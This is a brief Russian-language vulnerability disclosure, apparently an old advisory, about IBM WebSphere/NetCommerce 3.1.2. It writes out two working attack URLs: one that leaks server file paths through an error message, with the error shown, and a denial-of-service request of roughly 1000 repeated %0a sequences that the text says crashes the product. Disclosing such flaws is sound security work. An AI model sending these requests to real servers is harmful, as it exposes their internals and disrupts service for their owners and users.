В IBM Websphere/NetCommerce версии 3.1.2
обнаружился любопытный баг.
Путь
Можно узнать путь к
файлам. Вопрос:
http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
Ответ:
DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK in
file /usr/NetCommerce3/macros/en_US/macro.d2w
Простейшая DoS атака:
http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(повторить
около 1000 раз)..%0a
Netcommerce чудовищно
рушится.
